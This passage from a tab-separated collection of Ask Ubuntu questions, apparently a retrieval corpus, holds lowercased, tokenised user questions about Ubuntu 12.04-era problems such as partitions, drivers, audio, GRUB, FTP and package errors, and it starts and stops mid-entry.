b ] fetched 3 232 kb in 33s ( 95,1 kb/s ) preconfiguring packages ... selecting previously unselected package java-common . download failed oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up gsfonts ( 1:8.11+urwcyr1.0.7~pre44-4.2ubuntu1 ) ... setting up libfontenc1 ( 1:1.1.0-1 ) ... setting up libxfont1 ( 1:1.4.4-1 ) ... setting up x11-common ( 1:7.6+12ubuntu1 ) ... setting up xfonts-encodings ( 1:1.0.4-1ubuntu1 ) ... setting up xfonts-utils ( 1:7.6+1 ) ... setting up gsfonts-x11 ( 0.22 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 )
195298	how to access windows 7 partition files ?	in previous ubuntu versions i installed ubuntu and it always recognized the windows partition . i installed ubuntu 12.04.01 lts and i stoped to see the windows partition . how to access windows 7 partition files inside ubuntu ? ( read and change files ) thank you for help . diogo
195299	usb stopped working : what should i do ?	all of a sudden i am not able to use properly my external hdd and pendrives . the disks are correctly mounted , but navigating them is extremely slow and when i try to copy files from my laptop hard-disk to external drives , the copy starts , but then fails . i have tried several devices on both my usb ports ( one 3.0 , one 2.0 ) . how can i diagnose what is the problem and possibly fix it ?
195300	what is desktop environment and where is placed in linux architecture	what is the role of the desktop environment in the architecture of a linux-based operating system like ubuntu ? can anyone explain what a desktop environment is and how it relates to other components of the system ?
195304	kodak esp 1.2 printer not printing on ubuntu 12.04	we installed ubuntu 12.04 for a friend 's mother . she bought a kodak esp 1.2 printer in the meantime which does n't seem to work with it . the printer is connected via usb . she goes through the printer setup wizard . she can go until test print but nothing comes out . we have moved away from the area but can get remote access to the computer . is it possible to copy over a file from the install cd to somewhere on the computer itself ? would mac drivers work if they used gutenprint etc ? thanks in advance for your help !
195305	can i use juju with lxc in a non-local configuration ?	i 've looked at this post for setting up juju on a local environment with lxc . however , is there a way to use juju with lxc in a non-local environment ? i am looking at a scenario where lxc containers are deployed on multiple nodes . i.e. , lets say i have virtual machines m1 and m2 with wordpress deployed on a container in m1 and mysql deployed on a container in m2 . is there a way to orchestrate these deployments with juju ?
195307	.xsession . .xinitrc , xmonad , and lightdm	let me preface my question with the following : i am pretty sure that i can hack together a solution by modifying /usr/share/xsessions/somesessionfile.desktop and make it run /etc/x11/xsession , and get it to work that way , but i would still like to clear a few things up . setup : 12.04 , completely fresh installation ( 3 hours old , maybe ) . want to use xmonad as my wm . dual-head setup . my question : i am thoroughly , or rather utterly , confused about which program is doing what , regarding x , unity , login managers ( or whatever they are called ) and window managers . i am using xmonad as my window manager , i know this much . and when i log in , or perhaps even earlier , i want my dual monitors to be set up properly using a script that runs xrandr ( that i already have working ) . everyone i talk to or whose questions i read online talk about xinitrc , ~/.xsession or /etc/x11/xsession , but none of these files are being run . the files in /usr/share/xsesssions seem to be the only files that are being run , and i can not for the life of me find any documentation about any of this . where is the consistency in this system ? what , exactly , am i supposed to do if i want to do this properly ? some window managers seem to do this ( kde and gnome seem to have something just called 'autostart ' ) . am i supposed to let my window manager handle this , x , or lightdm ? i understand there are probably dozens of files in the startup process that i could possibly put this in , but i 'm asking for the proper convention . what is the solution , for something like this ? tl ; dr ; is there one , consistent way for me to run a script automatically for every window manager that runs on top of x , or does this depend entirely upon the combination of window managers and login managers i am using ?
195312	how to render minecraft on the gpu ?	hardware : intel i7 amd radeon hd 6970 ssd with plenty of space 6 gb ram software openjdk 6 , 7 , and oracle java 7 ( reproducible with all three ) amd catalyst 12.8 and open source driver ( reproducible with both ) ubuntu 12.04 x86_64 and older minecraft 1.3.2 vanilla and older on this setup i am getting rubbish frame rates after a short while of playing , dropping from about 45-55 to 15 in a couple of minutes . cpu use is 40-45 even when rendering the opening screen at 1920x1280 , and gamerenderer is using about 90 % cpu when playing . rather than trying to eke out a few more fps out of an obviously broken rendering pipeline , i really hope to find a solution to make the gpu render minecraft . edit 1 : something bizarre just happened : the first thing i always change in the settings is to turn bobbing off . turns out that re-enabling bobbing makes the frame rate shoot right back up from 15-20 to 30-50 ( mostly around 30 ) in fullscreen mode ! it is still rather erratic , bumping down to 15-20 sometimes , but usually only for a few seconds . also , the debug mode ( f3 ) shows that 100 % of the time is spent in `` unspecified '' . edit 2 : that seems to have been a dud - i disabled bobbing again a few minutes later , and it 's been running at 20-40 fps since . the snooper reports 24 fps .
195313	vmplayer does not flush all outputs to serial port	i am debugging a linux kernel in the vmplayer on ubuntu 12.04 configured a serial port to a file to see the debug information . however , each time when the kernel panics , only the backtrace stack were printed out instead of all the booting messages . this does not happend on vmplayer fusion . my .vmx file : serial1.present = `` true '' serial1.filetype = `` file '' serial1.filename = `` ~/tmp/serial.out '' serial1.startconnected = `` true '' msg.serial.file.open = `` replace '' serial1.yieldonmsrread = `` true '' my /etc/default/grub : grub_cmdline_linux_default= '' quiet '' grub_cmdline_linux= '' find_preseed=/preseed.cfg noprompt console=tty0 console=ttys1,115200n8 '' how could i flush every message to both tty0 and ttys1 ?
195314	hdmi with intel mobile 4 graphics controller	when connecting my tv over hdmi , it shows up in display settings and xrandr : aspire1825ptz : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) aspire1825ptz : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 256mm x 144mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected ( normal left inverted right x axis y axis ) 720x576 50.0 720x480 59.9 dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) tv1 disconnected ( normal left inverted right x axis y axis ) however , the resolution is way too low and the screen remains black . everything works fine in windows , but i 'd rather not reboot just to watch a film . could anyone help me please ?
195316	i need help installing my dlink dwa-160 usb adapter on ubuntu 12.04.1 ?	i bought the dlink dwa-160 usb adapter a few days ago and i could not get it work . i tried using windows wireless drivers and it found the device but no communication was made . i also tried to use wine to run the installation cd but it could n't find my hardware . i am alright at computers and i am new to ubuntu can someone please give me detailed instruction on how to get it to work . thanks .
195317	how to re-install ubuntu without losing files ? ( edit - files lost - urgent help needed )	sometime back i bought a second pc to serve as my backup machine , but i 've never managed to have it as i would like . now i want to start over , but i 've messed so much with it 's disks that i 'm kinda afraid to lose something on the way , thus this question . right now , i have a 1tb disk partitioned like this ( as per gparted ) : /dev/sda1 ( ext4 ) 346.12gb - > is almost full , has an old install of ubuntu 11.10 . it no longer boots , ever since i installed windows7 on /sda3 . everything that matters to me is tucked into /var/www/ all the rest can just go . /dev/sda2 ( ext4 ) 196.45gb - > has an old install of 12.04 and nothing important , it 's pretty much empty and also does n't boot . /dev/sda3 ( ntfs ) 377.97gb - > is my boot partition with windows 7 , some important files and i 'd like to keep it untouched . /dev/sda4 ( extended ) 10.97gb - > was created when i first installed ubuntu , i think . in my ideal world , i 'd like to safely reinstall ubuntu from the 12.04 liveusb and merge sda1 and sda2 without losing any files . is that possible ? how ? desperate update things got really ugly right now . i tried for a few days to follow marty 's advice , but something is up . i did the first part , of wiping the second partition and enlarging the first . then i could n't get super grub disk to work . tried from the live usb , then tried to make a usb disk for it , and it would n't boot . so i let it cool and returned today to the system . to my surprise , when i booted from the live usb and ran install ubuntu 12.04 lts the program recognized thw instalation of 11.10 and offered me an option to just update it without loosing any files . i went joyfully to it . after the update finished , booting did n't work , i got `` input not supported '' and booted back from the usb . then i went to see if everything was ok , and for my desperation , i just ca n't find the /var/www folder where i had everything . gparted also tells me the partition is now almost empty . i did n't do any sav operation on the hd after this and shut it down immediately to avoid any more damage . now i really need those files back . how can get them in the safest way possible ?
195322	install problems on asus x401a notebook	okay ... i tried many approaches to install ubuntu 12.xxx on my new asus notebook with varying degrees of failure ... first : i 'm not a newbie but i 'm as frustrated as one ! install background : install from usb dvd drive : the install went well . re-booted machine . choose ubuntu and it errors with a mbr file error ( ca n't remember the exact wording - something to do with missing the file . choosing to boot w7 works fine . install from usb stick : could n't get machine to recognize the .iso install into oracle 's vbox : got the boot splash screen , then hangs with a zillion errors . note : i did n't have any problems installing ubuntu in vbox on my imac and it run 's great . installed using wubi : installed fine but get errors when booting ubuntu ( it does n't find the needed wubi files ) . i downloaded to the c : drive and tried installing from there - no luck . for kicks : i tried running slax linux .iso from a usb stick and it runs fine . some questions : did i use the correct .iso ? ( i tried 12.04.0 and 12.04.1 both 32 and 64 bit versions . i simply downloaded them from the download link and did n't use/look for an alternate version . do i need to do something special when burning the .iso to disc ? what ? i did read tons of posts but , no luck with finding the solution . any help is appreciated ... thanks
195323	what is the shortcut key to skip a song in rhythmbox ?	when rhythmbox is not active/not focused and when i am on some other application window . how to skip/stop/resume songs that are playing in rhythmbox . is there any shortcut key to do that ? i know when i am on ubuntu desktop i can press alt+10 to get the focus of indicator applets from there i can navigate to rhythmbox and use arrow keys to skip it ( < - / - > ) but is there any other direct shortcut to do this ? thanks
195327	how to get the tray icon highlighted when an email in a local folder is received ?	when i get a new email in my inbox folder , the tray icon changes to blue ( in ubuntu 12 ) , but when i use a filter to move the email to a local folder , the tray icon does n't change ! how can i solve this ? thanks ! ( it 's being cross-posted from the thunderbird forums , where i had no response )
195330	how do i confirm my vpn connection is working and make it start automatically on 12.04 server via commandline ?	i 'm using vyprvpn as a vpn provider and i would like to make my ubuntu 12.04 server connect to it via pptp-linux . i only have the option of using the command line to connect so i used this guide : https : //wiki.ubuntu.com/vpn and it seems to work , but , i do n't think i 'm sending my data through the connection . my server has a static ip and i tried putting that ip in the settings . i 'm trying w3m on ipchicken and not noticing any changes . how do i make sure its traffic is going through the vpn ? once this works , how do i make the vpn client connect automatically whenever it has internet ? cheers ( finally , as a bonus , how do i update my nameservers ? will it work with the vpns address ? )
195334	clone everything to ssd	i am anxiously awaiting my new ssd for my ubuntu server , and realized i have no idea on how to copy all my files from my hard drive to my ssd . is there any easy or moderately easy way to do this ? i want os to boot from ssd and keep the hard drive as a file storage drive . i know there are some iso downloads , but have n't found any compatible with ubuntu server 12.04 . thanks : ) ccrama
195335	android device connects to my computer , but does n't play audio over bluetooth	i turn on bluetooth on both my devices and open up music on my android . i select a song to play , press the menu button , and tap `` via bluetooth '' : i tap on my computer in the `` bluetooth device picker '' : then it says , under the name of my computer : connected to media audio now i should technically be able to play music through my computer , since it `` just worked '' in kubuntu with blueman . but nope , something must be up with pulseaudio , because i hear no sound from my computer ( i 'm running xubuntu 12.04 ) . the reason i say this is that the devices list in blueman shows indication of data transfer and it says it 's connected , but in the pulseaudio volume control has no indication of my bluetooth device ( or blueman ) playing audio .
195337	how to auto mount partition on startup in xubuntu ?	i want to auto mount all my partitions on startup . this is how my /etc/fstab file looks like : proc /proc proc nodev , noexec , nosuid 0 0 # entry for /dev/sda1 : uuid=3bf842ea-923b-43fe-b5f9-066fc920aaec / ext4 errors=remount- $ # entry for /dev/sdb1 : uuid=f0c859bdc8598330 /media/bas ntfs-3g defaults , locale=en_us.utf-8 $ # entry for /dev/sda3 : uuid=146213a76d02f7ad /media/sda3 ntfs-3g defaults , locale=en_us.utf-8 $ uuid=1c33a98704d941f1 /media/sda3 ntfs-3g defaults , locale=en_us.utf-8 $ # entry for /dev/sda5 : uuid=ba48c631-5652-4ce7-85a3-bda96b353ca7 none swap sw 0 $ the last line i added myself manually . can anyone help me with this ?
195342	how to control the focus system in 12.04	i recently moved over from windows , and i apologize if this is a stupid question but i read the manual , tried searching various terms , and could not find anything that helped me . i do n't know how to switch focus in ubuntu . for example when i click something to download from firefox , and the pop up comes up asking if i want to save the file , i ca n't get my mouse to be active on the new window . i try clicking the top of the new window , i tried clicking on the top of the active window then the top of the new window , i pop up the dash and then put it away . i 've tried ctrl+alt+f2 then ctrl+alt+f7 because someone with a similar problem solved it by doing that each time but it does n't work . i just alt+f4 the browser then push tab until the save button is highlighted then push enter , but its not a solution that is practical . i tried reading the manual , ubuntu desktop tutorial , youtube videos for complete beginners , and the youtube video user 's mouse works fine while mine does not , even if i mimic his exact actions . i reinstalled ubuntu and followed everything the guy did for searching files and my mouse does not work like his does . i 'm sure the solution is really simple but i 've spent 2 hours a day for the past 2 days googling on a separate computer and i ca n't find a solution and its stressing me out . please help .
195347	how do i deactivate dynamic contrast on a dell xps ?	i am experiencing annoying automatic backlight brightness changes under ubuntu 12.04 lts on my dell xps ultrabook . it seems to be connected to the amount of white pixels on the screen ( switching back an forth between dark/light application windows makes the effect noticable , but also just scrolling through a website . ) so i think it is the dynamic contrast feature of the notebook screen . how do i turn this off in ubuntu ? windows offers specific intel driver options for this , but i ca n't find any for ubuntu . model : dell xps 14 ultrabook and currently running unity
195350	test sounds missing after messing with pulseaudio and jack	so after installing jack and using 'sudo usermod -a -g audio username ' and restarted . this made jack work however no program using pulseaudio ( more or less everything ) made any sound . i purge removed pulseaudio , restarted , reinstalled it , restarted and finally the sound was working again . the only place sound wo n't come from is the test area in sound preferences . i realise that performing a command i know little about was daft and that those test sounds are n't of very high importance , but i like things to run as intended . if anyone can help , it 'd be very appreciated . thanks in advance .
195352	need help to recover data	ubuntu 10.04.4 lts after power outage system hangs on boot at checking battery state === > ok i could do with knowing if putting a setup disc in & reinstalling will wipe the data off or not . anyone has a fix for this problem so that i can get back to the data . anyone knows a way of getting the data off onto a temp win disc . thanks in advance for looking at this post .
195354	input microphone dead ubuntu 12.04	my microphone does n't work in any format . i 've installed pulse audio , it does n't give me the chance to set up . it is a dell inspiron e1505 under ubuntu 12.04 . i need the mic to speak with my family in google hang-outs . i 've tried with sounds settings , control volume and sound record , but nothing works . please help , thanks a lot ! maria
195356	how to convert 5.1 aac streams to ac3 for s/pdif output ?	i connect my pc to my home theater via spdif , so when watching video files that uses aac 5.1 channels , it is downmixed to stereo and the surround channels are lost . i would like to be able to convert all 5.1 aac output to 5.1 ac3 , so my ht properly plays 6 discrete chanels . my current approach is to use avconv to convert my files 's audio streams like this : avconv -i < inputfile > -codec copy -codec : a ac3_fixed -b : a 448k < outputfile > it works , but it has a few drawbacks : all audio streams are converted to ac3 , even the ones i do n't need or want to , like stereo , dts or ac3 . i would like to convert only the aac 5.1 ones . command should be generic enough so i do n't have to inspect the file or pick streams manually . while conversion works fine , there are a few issues : volume is huge , loud as i 've never seen before , and i fear some metadata is lost on conversion . i must run this for every video i want to watch . it takes time and waste a lot of hdd space . so , is there a solution that fixes at least one of these drawbacks ? possible approaches : set os ( pulse audio ? ) to encode multichannel pcm to ac3 on-the-fly ? ( that would be amazing , since it would not only with videos but also for games . fix my command line with some smart parameters thanks !
195361	chsh -s /usr/bin/zsh not working	i 'm trying to permanently change my shell to zsh using chsh command , but it 's not working . zsh is installed ( via apt ) and works fine when i invoke it directly from a bash prompt terminal . but i ca n't get zsh to load in terminals by default , and chsh is doing something weird : $ > echo $ shell /bin/bash $ > which zsh /usr/bin/zsh $ > chsh -s /usr/bin/zsh password : $ > echo $ shell /bin/bash $ > grep kurtosis /etc/passwd kurtosis : x:1000:1000 : kurtosis , , , :/home/kurtosis : /usr/bin/zsh it appears chsh has managed to correctly change /etc/passwd , but not the $ shell env variable . as such , new terminals always start in bash and not zsh . i 'm not sure where to look to troubleshoot this . .bashrc , even though it 's not invoked until the shell is specified ? any help appreciated .
195362	how do i install the latest gcc etc on 10.04 ?	so , basically i want to still have gnome 2 because i need a theme for it ( mac os x like theme ) but i want to have gcc 4.7.1 and some related packages because i 'm involved in developing c++11 applications and so on . i currently use arch linux ( i know there 's rollback system etc but i do n't feel like breaking lots of packages ( and might have system breakage as well [ ? ] ) just cause of gnome 2 ) but i never liked the gnome 3 look , and is known as non productive desktop , i myself found it really bad the first time i tried it . i heard about ppa and stuff but exploring their repos for this version of ubuntu but it seems to not have the gcc version i want ... so , please suggest a good way of installing some of the latest good software out there , like gcc without breaking apt ( wish i could simply just install everything from source and wipe apt ) . please do not suggest to install gentoo or something , i do n't feel like wasting another week .
195366	gnome 3 , maximize , un-maximize window	i used to be able to use alt+f9 , alt+10 ... how can i restore this on gnome3 , ubuntu 12.04 ?
195368	can not upgrade from 12.04	a while ago i tried upgrading from 12.04 to 12.04.1 , i believe it was , and in the middle of it i lost power and my computer died . i tried resetting it and it was stuck on the black screen with the blinking cursor . eventually i managed to recover it and get it sort of working through various terminal commands , but now i ca n't use update manager to update to the next version . whenever i pull up update manager it gives me this message : '' not all updates can be installed run a partial upgrade , to install as many updates as possible '' and goes on to list possible causes of it and then gives me the option to do the partial upgrade or to close . then a window comes up saying : '' can not upgrade an upgrade from 'precise ' to 'oneiric ' is not supported with this tool . '' so how do i go about upgrading ? is my only option a fresh install ?
195371	can internet explorer 9 or 10 be installed on ubuntu ?	trying to figure out whether the internet explorer 10 or internet explorer 9 can be installed on ubuntu or not ? has anyone tried it successfully ? can it be installed in the first place ? i have searched this topic on google , but surprisingly did not find a single thing related to it .
195378	12.04 taking forever for no apparent reason	first off , i 'd just like to say how much i 'm loving ubuntu so far . it 's one of my first steps into linux , but so far it 's blown away windows in almost every regard . now , onto my problem . my brothers have some old dell dimensions that are barely clinging to life . they were both running xp home premium . the 2400 installed just fine , no issues at all . now , the other computer , the 3000 is n't clearing the screen with the ubuntu logo and the pulsing dots . i 've tried multiple discs , including the exact same one that gave me no issue in the other computer , and i 'm at a loss . does anyone have any suggestions as to where the problem might lay ? they 're both 32 bit intel processors , and it 's the correct version of ubuntu . is it a bad disc drive ? hardware incompatibility ? thanks for any assistance that can be provided . dell dimension 2400 dell dimension 3000
195381	no cursor output on the sceen when typing password in terminal	i am in the process of trying to get a vpn started on my pc , and i have quake terminal running and that 's when it would not register the keyboard when i was typing in the password for sudo . so i rebooted and tried the command terminal that came with the disc , and it still will not register an entry into the password zone .
195383	how can i use rhythm box and conky together ?	i 'm still fairly new at this and 12.04 lts is my first hands on experience with ubuntu all together . after spending a few weeks and trying to learn the in 's and out 's of the os , i 'm actually finding it easier to use in my off-time than windows . however , my question today deals with the following : i need help in trying to pull information from rhythm box in order to display it using conky . what i want is the following : » album title » song name » artist » album picture is there a way to pull these and display them so that they will change as the songs change ? i tried my hardest but i 'm still a noob when it comes to using terminal and coding .
195384	a specific user is unable to log in to vsftpd	i am setting up a new user let his name be ftpguy . he has access to only one directory /var/www/xxx . i have already chowned the directory so that he has write and read privileges . the user is also unable to login via ssh as i have disabled that by changing his shell to /sbin/nologin . also , in vsftpd config , i have enabled the chroot_local_user . now whenever i log in from ftp , i get an auth error . connect socket # 1008 to xxxxxxxx , port 21 ... 220 welcome to blah ftp service . user ftpguy 331 please specify the password . pass ********** 530 login incorrect . i changed the password to something different several times , using the passwd command , nothing happens , i still the above error . however i am able to log in with my ssh creditals to my ftp server without any problems . ( i do not use a key ) .
195386	problem with dropbox installing	installing in 12.10 beta . this message : breaks existing package `` nautilus-dropbox '' conflict : dropbox ( )
195390	grub gives messages about the boot sector being used by other software . what should i do ?	this only happens with one of my computers . it is an elderly laptop that has had a long and varied history with several operating systems , but in its retirement it is acting as a server for my home network using ubuntu 12.04 . it is a single-boot system , there are no other systems installed . every so often , whenever there is a grub upgrade , i notice a message like this : setting up grub-common ( 1.99-21ubuntu3.4 ) ... installing new version of config file /etc/grub.d/00_header ... setting up grub2-common ( 1.99-21ubuntu3.4 ) ... setting up grub-pc-bin ( 1.99-21ubuntu3.4 ) ... setting up grub-pc ( 1.99-21ubuntu3.4 ) ... /usr/sbin/grub-setup : warn : sector 32 is already in use by flexnet ; avoiding it . this software may cause boot or other problems in future . please ask its authors not to store data in the boot track . installation finished . no error reported . should i be worried about this ? what ( if anything ) should i do about it ?
195399	how can i programmatically block user input for a given time ?	as a person working in computer science working offline to avoid facebook and thelike is not always ( meaning hardly ever ) possible for me since i mostly have to be online to work . i have tried leechblock and similar things but the problem becomes that at some point i start making systems for myself to hack , which is kind of pointless if oyu have root . i would very much like to try out the method described here . ( short version : reboot your pc every time finish a task or get bored with it ) unlike for the author of this blog my work is mainly done not in screen sessions but in ides ans other not-so-fast-to-start-up stuff , meaning a full reboot including loading all my programs will take its time . so , the question is : how can i block all user input and preferrably blank the screen for a given amount of time ? the idea would then be to have a keyboard shortcut to activate the script/program ( which would probably also have to have root i guess ? )
195403	how to repair ubuntu package catalog ?	reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : totem-plugins : depends : libgnomeui-0 ( > = 2.17.1 ) but it is not going to be installed depends : libtrackerclient0 ( > = 0.6.6 ) but it is not installable depends : python-gdata but it is not going to be installed depends : totem-gstreamer ( = 2.22.1-0ubuntu3.8.04.6 ) but it is not installable or totem-xine ( = 2.22.1-0ubuntu3.8.04.6 ) but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
195404	installing of eclipse on 12.04 lts	i have downloaded eclipse-jee-juno-sr1-linux-gtk.tar.gz from eclipse site . i want to use this downloaded file with ubuntu software center so that i need not to download all the data again if i install eclipse with ubuntu software center . i do n't want to manually install it . thanks in advance
195407	how to see the full file name on the lubuntu desktop ?	if i have a file with several characters in it , only a certain number of initial characters is displayed on the lubuntu desktop and xfce desktops . for example , i have a file titled , `` interesting-links-on-default-browsers '' . it shows as `` interesting-links-on-def ... '' with both des . however , single-clicking on the file in xfce shows the full title but the truncated title remains in lubuntu . it 's not a big deal , but if it 's just a matter of setting something somewhere to get the full title visible on single-click , i 'd be grateful for pointers . edit : lubuntu 12.10 edit on 20121020 : for clarification , i 'm meaning the icons on the desktop and not the `` icon view '' mode in the file manager ( pcmanfm ) . edit on 20121111 : see bug # 3586184 .
195412	sharing internet connection over bluetooth from desktop to android	what i have is these desktop pc without a wifi adapter bluetooth dongle android phone what i want is sharing the internet connection on desktop with the phone . although it has been asked on the forum but it was for nokia phones . kindly tell me what to do stepwise as i am quite new to ubuntu .
195416	huawei e353 usb stick no connecting to internet ubuntu 12.04 lts	i have installed the latest version of the usb-modeswitch . ubuntu recognizes the usb stick but connection to internet is missing .
195419	django 1.4 dependency when packaging a precise application	i am trying to package a program i wrote that depends on django 1.4.1 in ubuntu 12.04 . as django 1.4.1 is n't available in precise i am wondering if it is best to : package up django 1.4.1 and drop it in my ppa or write a script that wgets django at build time and installs . or something better that i have n't thought of . i am still inexperienced with packaging and would appreciate some advice thanks
195420	is it possible to open directories as administrator ?	i want to have a root privileges on some directories . how can i do this ?
195426	how do i apt-get gddrescue and testdisk ?	gddrescue and testdisk are not on the 12.04 iso that i downloaded and burned to a cd that i 'm currently using to boot my system . where do i point apt-get to install those packages ? i have internet access but got this results : root @ ubuntu : / # sudo apt-get install testdisk reading package lists ... done building dependency tree reading state information ... done e : unable to locate package testdisk root @ ubuntu : / #
195427	monodevelop bug - need help !	can someone at least give me an idea about who to ask about this ? fresh install of ubuntu 12.04 monodevelop locks up at the deploy dialog . any advice would be greatly appreciated .
195428	how to mount additional windows partitions in a wubi installed ubuntu ?	i am new to ubuntu . i was using windows vista ultimate before i came to ubuntu . can you give me a solution to discover all my files ? i have two partition in windows : c : and d : \ . in d : \ , i kept all my files , movies , songs , pictures , books , games , backups & etc . but i can not find any of these in ubuntu . in fact i ca n't even find my d : \ . all i found is a folder name `` host '' and there i can see all my c : \ files . please help me . all of my important files are in d : \ . i downloaded ubuntu 12.04 and installed it with wubi . is this the cause for not seeing my folders ? should i install ubuntu from a cd or usb ? i ca n't even connect to internet . i am using a broadband connection . what should i do ? please help me and make me a user of ubuntu . otherwise , i have to go back to microsoft windows vista/7 .
195437	xubuntu 12.04 : random boot to black screen	my xubuntu 12.04 has worked flawlessly since install in september . however , lately i randomly have the following boot issue : the computer boots to grub , and after choosing xubuntu either boots normally or boots to a black screen . here are some observations i have made : the black screen seems to happen randomly . the black screen does not seem to happen in safe mode ( - nomodeset in grub ) . the black screen does not allow me to ctrl + alt + f1-6 into a terminal . the black screen allows me to use sysrq keys ( alt + sysrq + k does not work though ) . the black screen often happens on first boot in several hours and the computer usually boots normally after a rseinub . when the computer boots i get `` sp5100 tco timer : mmio address 0xfec000f0 already in use '' at startup and `` could not write bytes : broken pipe '' at shutdown . however research on these errors did not yield answers to my particular issue . comparing xorg.0.log ( successful boot ) and xorg.0.log.old ( black screen ) , and reading the answers to similar problem , it seems that i might have a x driver issue . however the system worked flawlessly until lately . additional info on my system : acer ao722 c62kk operating system : 3.2.0-31-generic ubuntu edit : i made a fresh install of xubuntu 12.04 x64 , the issue is still there ... ( i have a separate /home so config . files were not erased ) . edit 2 : i followed troubleshooting blank screen , so my new observations are without quiet and splash in grub : when the system boots normally , the screen goes black after grub then lights up and displays text information then goes to login screen . ( after that the desktop starting time vary substantially , which is new and may be a separate issue ? ) . when the boot fails , after grub the screen goes black , lights up , goes black , lights up again and most times goes black again . at this point it responds to alt+sysreq k by lighting up but no more , and has to be rebooted through alt+sysreq+ rseinub . edit 3 : i tried to remove all . * configuration folders since a fresh install did not fix the issue , but it did not work ... edit 4 : i reinstalled grub2 from scratch and the issue still exists . however i checked my kern.log file and the following errors appear when i have the blank screen : oct 19 07:49:00 thibaud-ao722 kernel : [ 37.856526 ] [ drm : r600_ring_test ] *error* radeon : ring test failed ( scratch ( 0x8504 ) =0xcafedead ) oct 19 07:49:00 thibaud-ao722 kernel : [ 37.856539 ] [ drm : evergreen_resume ] *error* evergreen startup failed on resume oct 19 07:49:00 thibaud-ao722 kernel : [ 37.952276 ] wlan0 : no ipv6 routers present oct 19 07:49:01 thibaud-ao722 kernel : [ 39.088310 ] [ drm : radeon_ib_schedule ] *error* radeon : could n't schedule ib ( 4 ) . oct 19 07:49:01 thibaud-ao722 kernel : [ 39.088326 ] [ drm : radeon_cs_ioctl ] *error* failed to schedule ib ! after some quick research it appears i likely have the bug filed here : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1058303 . i am now wondering if i should use the old .30 kernel or the one provided in the bug report . thank you for your time and attention in advance ! thibaud ruelle
195438	unable to locate package , ca n't install software	whenever i try to install any package in ubuntu 10 , i type the command sudo apt-get install vlc and also the command sudo apt-get update but i get this error every time unable to locate package vlc i tried sudo apt-get update again but i still get the same error . please help me . is there something i have to change in the repositories ? please give some suggestions .
195440	what are the iommu groups that come with the kernel 3.6 ?	kernel 3.6 comes with a new feature called iommu groups . so what are these groups and how it will serve virtualizarion
195444	how to play music track in rhythmbox without re-importing tracks when restarting ubuntu	i am using ubuntu 12.04 and have rhythmbox as my default music player but the problem is when i press the start button it does n't play each time when i restart ubuntu , i have to import track again . all my tracks are in the partition lablel `` songs '' . one thing i found the track in the missing library but still it does n't let me play .
195445	is there way to get close button in windows spread view in 12.04 ?	is there way to get close window button in windows spread view for ubuntu 12.04 like it made in 12.10 ? maybe exists some backport or config for that compiz plugin ?
195449	cursor changes its position to any random position itself while typing	i am using kubuntu 12.04 , since ubuntu 11.04 i am facing this problem . most of time my pointer 's position changes to any random position itself and it start typing somewhere else and sometime content of last copied lined get pasted itself at current position . this spoils my text , i have to undo every time . i am very sure that i do n't touch my touchpad . what can be wrong ? please suggest .
195456	how do i know if an independent app that is in 12.04 will appear in 12.10 again ?	there are some apps like usplitter , fogger , lightread and so on in ubuntu 12.04 . is there a way to find out now if those will appear again in the final version of ubuntu 12.10 ?
195459	how to create wifihotspot in ubuntu 10.04 lts	i am using ubuntu 10.04 lts in my lenovo laptop and have a android ics device . i want to create a wifi-hotspot in ubuntu , which i can later use for connecting android device . i need this setup for capturing the packets from android device and later analysing them using wireshark in my ubuntu . i tried to create a new hotspot using `` create a new wireless network '' wizard from network manager applet , but for some reason the following happens . it breaks the existing internet connection ( either the wlan , or ethernet ) its not visible in the list of available wifi hotspots in the android device . my chipset information 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:03.0 communication controller : intel corporation mobile 4 series chipset mei controller ( rev 07 ) 00:19.0 ethernet controller : intel corporation 82567lf gigabit network connection ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 